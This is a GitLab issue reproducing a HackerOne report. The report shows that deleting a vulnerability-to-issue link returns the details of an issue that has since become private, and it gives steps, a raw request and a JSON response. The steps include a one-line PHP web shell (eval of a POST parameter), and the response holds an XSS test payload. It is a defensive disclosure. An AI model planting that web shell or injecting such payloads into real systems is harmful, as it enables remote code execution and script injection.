Ability to access a previously accessible issue

HackerOne report #1179733 by wi11 on 2021-04-29, assigned to @ankelly:

Report

Summary

Hi team,

At GitLab, you can link to an existing issue for a vulnerability, and the issues can be linked across groups and projects.
The user can't link an issue that he can't access to. But the user can delete the issue link he has created before, and the related information about the issue will be returned when deleting, so if an issue link is created by a user and the visibility level of this issue is changed, the user can still delete this issue link to get the information about the issue that he can't access.

Request

DELETE /api/v4/vulnerabilities/7989487/issue_links/9274 HTTP/1.1  
Host: gitlab.com

Steps to reproduce

Step to reproduce
You need two accounts to reproduce this.

1.As the victim, create a public project -> create an issue.

2.As the attacker, You need to have a Vulnerability Report.(if you have one, jump to Step 4)
3.As attacker -> create a project -> go to Security & Compliance -> Configuration -> Enable (SAST) -> upload a php file with code <?php eval($_POST['888']);?> to your repository -> wait for the pipeline passed -> go to Vulnerability report.
4.Go to Vulnerability report -> link issue that you create on Sept 1. (Paste the issue link)
5.Intercept the request -> remove the issue you will intercept the request like this, and send it to the repeater, remember don't forward it otherwise it will be removed
6.As the victim, change the project visibility to private and make some changes to the title and description on the issue that created at Step 1.
7.As the attacker sends the request, you will find that the information of the issue is returned.

Impact

After an issue became inaccessible to the attacker, he still can retrieve information about the issue. (title, description, state, assignees, etc.)

What is the current bug behavior?

When an issue link with a previously accessible issue was delete the information of the inaccessible issue was returned.

DELETE /api/v4/vulnerabilities/[REDACTED]/issue_links/9274 HTTP/1.1  
Host: gitlab.com  
Connection: close  
Accept: application/json, text/plain, */*  
X-CSRF-Token:   
X-Requested-With: XMLHttpRequest  
Origin: https://gitlab.com  
Accept-Encoding: gzip, deflate  
Cookie:

HTTP/1.1 200 OK  
Date: Thu, 29 Apr 2021 06:21:32 GMT  
Content-Type: application/json  
Connection: close  
Vary: Accept-Encoding  
Access-Control-Allow-Credentials: true  
Access-Control-Allow-Methods: GET, HEAD, POST, PUT, PATCH, DELETE, OPTIONS  
Access-Control-Allow-Origin: https://gitlab.com  
Access-Control-Expose-Headers: Link, X-Total, X-Total-Pages, X-Per-Page, X-Page, X-Next-Page, X-Prev-Page, X-Gitlab-Blob-Id, X-Gitlab-Commit-Id, X-Gitlab-Content-Sha256, X-Gitlab-Encoding, X-Gitlab-File-Name, X-Gitlab-File-Path, X-Gitlab-Last-Commit-Id, X-Gitlab-Ref, X-Gitlab-Size  
Access-Control-Max-Age: 7200  
Cache-Control: max-age=0, private, must-revalidate  
Etag: W/"23a17e185fb2cd10bfa81a06e6f25d84"  
Vary: Origin  
X-Content-Type-Options: nosniff  
X-Frame-Options: SAMEORIGIN  
X-Gitlab-Feature-Category: vulnerability_management  
X-Request-Id: 01F4E4M9NQCH1XTG95DP4NQGNJ  
X-Runtime: 0.237133  
Strict-Transport-Security: max-age=31536000  
Referrer-Policy: strict-origin-when-cross-origin  
RateLimit-Observed: 9  
RateLimit-Remaining: 1991  
RateLimit-Reset: 1619677352  
RateLimit-ResetTime: Thu, 29 Apr 2021 06:22:32 GMT  
RateLimit-Limit: 2000  
GitLab-LB: fe-09-lb-gprd  
GitLab-SV: localhost  
CF-Cache-Status: DYNAMIC  
cf-request-id: 09bde33e1e00001a5e7033d000000001  
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"  
Server: cloudflare  
CF-RAY: 64766e4368b11a5e-SIN  
Content-Length: 3692

{"id":9274,"vulnerability":{"id":7989487,"title":"Please do not use eval() functions","description":null,"state":"confirmed","severity":"high","confidence":"unknown","report_type":"sast","project":{"id":25475655,"description":"bug test bug test bug test  bug test !!!!!'\"\u003e\u003cimg src=zqzq onerror=alert(1)\u003e","name":"easy-money-maker","name_with_namespace":"ezgama / easy-money-maker","path":"a-project","path_with_namespace":"ezgama/a-project","created_at":"2021-03-28T06:36:35.788Z"},"finding":{"id":9486278,"created_at":"2021-04-06T08:16:39.241Z","updated_at":"2021-04-06T08:16:39.500Z","severity":"high","confidence":"unknown","report_type":"sast","project_id":25475655,"scanner_id":95603,"primary_identifier_id":2065399,"project_fingerprint":"b7b70a4e7acf2a02fd311dc34504a007f757bde4","location_fingerprint":"78df993d22174e7368adc689a1ed89fb927cbfbf","uuid":"6597da14-4b91-556d-b041-7d89d74fc1fb","name":"Please do not use eval() functions","metadata_version":"14.0.0","raw_metadata":"{\"id\":\"389d0a0ec7a6b2c2e6b8da2ab910aa123ee9bf462411c4de6c9bafe8e492ac7b\",\"category\":\"sast\",\"name\":\"Please do not use eval() functions\",\"message\":\"Please do not use eval() functions\",\"description\":\"Please do not use eval() functions\",\"cve\":\"mama.php:PHPCS_SecurityAudit.BadFunctions.NoEvals.NoEvals\",\"severity\":\"High\",\"scanner\":{\"id\":\"phpcs_security_audit\",\"name\":\"phpcs-security-audit v2\"},\"location\":{\"file\":\"mama.php\",\"start_line\":1},\"identifiers\":[{\"type\":\"phpcs_security_audit_source\",\"name\":\"PHPCS_SecurityAudit.BadFunctions.NoEvals.NoEvals\",\"value\":\"PHPCS_SecurityAudit.BadFunctions.NoEvals.NoEvals\"}],\"remediations\":[null]}","vulnerability_id":7989487,"details":{},"description":"Please do not use eval() functions","message":"Please do not use eval() functions","solution":null,"cve":"mama.php:PHPCS_SecurityAudit.BadFunctions.NoEvals.NoEvals","location":{"file":"mama.php","start_line":1}},"resolved_on_default_branch":false,"project_default_branch":"master","author_id":8546086,"updated_by_id":null,"last_edited_by_id":null,"resolved_by_id":null,"dismissed_by_id":null,"confirmed_by_id":8546086,"start_date":null,"due_date":null,"created_at":"2021-04-06T08:16:39.453Z","updated_at":"2021-04-29T05:46:07.075Z","last_edited_at":null,"resolved_at":null,"dismissed_at":null,"confirmed_at":"2021-04-29T05:23:52.331Z"},"issue":{"id":86180604,"iid":16,"project_id":25969925,"title":"BUGSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS","description":"BUGBGUBGUBUGBUGBUGBUGSDDDDDDDDDDDDDDDDDDDDDDDDDD","state":"opened","created_at":"2021-04-29T05:57:17.615Z","updated_at":"2021-04-29T06:21:08.450Z","closed_at":null,"closed_by":null,"labels":[],"milestone":{"id":2023885,"iid":1,"group_id":11753634,"title":"group milestone","description":"","state":"active","created_at":"2021-04-29T05:10:02.829Z","updated_at":"2021-04-29T05:10:02.829Z","due_date":null,"start_date":null,"expired":null,"web_url":"https://gitlab.com/groups/dvadegroup/-/milestones/1"},"assignees":[],"author":{"id":8696838,"name":"dva dva","username":"dva_dva","state":"active","avatar_url":"https://assets.gitlab-static.net/uploads/-/system/user/avatar/8696838/avatar.png","web_url":"https://gitlab.com/dva_dva"},"assignee":null,"user_notes_count":0,"merge_requests_count":0,"upvotes":0,"downvotes":0,"due_date":"2021-08-20","confidential":true,"discussion_locked":null,"web_url":"https://gitlab.com/dvadegroup/dvadeproject/-/issues/16","time_stats":{"time_estimate":0,"total_time_spent":0,"human_time_estimate":null,"human_total_time_spent":null},"task_completion_status":{"count":0,"completed_count":0},"weight":100,"blocking_issues_count":0},"link_type":"related"}

What is the expected correct behavior?

the information of the inaccessible issue should not be returned.

Output of checks

This bug happens on GitLab.com

Impact

After an issue became inaccessible to the attacker, he still can retrieve information about the issue. (title, description, state, assignees, etc.)

Attachments

How To Reproduce

Please add reproducibility information to this section:

Edited Mar 07, 2022 by Costel Maxim